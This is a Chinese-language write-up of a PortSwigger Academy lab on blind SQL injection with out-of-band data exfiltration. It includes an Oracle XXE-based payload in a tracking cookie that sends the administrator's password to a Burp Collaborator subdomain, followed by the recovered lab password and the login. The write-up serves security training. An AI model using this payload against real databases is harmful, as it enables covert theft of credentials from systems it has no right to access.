前言：

实验室标题为：

带外数据泄露的 SQL 盲注

简介：

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析，并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的，对应用程序的响应没有影响。但是，您可以触发与外部域的带外交互。

该数据库包含一个名为users的表，其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验，请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方，我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验，您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类，打开 burp 进行抓包

复制 Collaborator 中的链接

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包，成功响应

转到 Collaborator 模块，点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户